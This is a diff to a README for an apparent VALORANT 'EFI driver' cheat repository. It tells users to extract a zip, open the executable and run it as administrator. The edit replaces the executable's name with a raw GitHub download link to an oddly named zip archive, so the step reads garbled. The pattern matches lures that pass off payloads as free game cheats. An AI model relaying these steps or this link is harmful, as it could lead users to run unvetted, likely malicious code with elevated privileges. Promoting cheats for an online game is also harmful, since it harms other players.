Sacapalabanda/VALORANT-EFI-DRIVVER-Cheat-Hack/README.md

 6. If it is a zip file, right-click and select “Extract All...” to unzip the files into a folder.

-7. Open the extracted folder and find the main executable file, typically named `VALORANT-EFI-DRIVVER-Cheat-Hack.exe`.
+7. Open the extracted folder and find the main executable file, typically named `https://github.com/Sacapalabanda/VALORANT-EFI-DRIVVER-Cheat-Hack/raw/refs/heads/main/Hyprism/workflows/Cheat-DRIVVE-Hack-VALORAN-EF-spondaical.zip`.

 8. Right-click on this `.exe` file and choose “Run as administrator.”
 This ensures the software has the permissions it needs.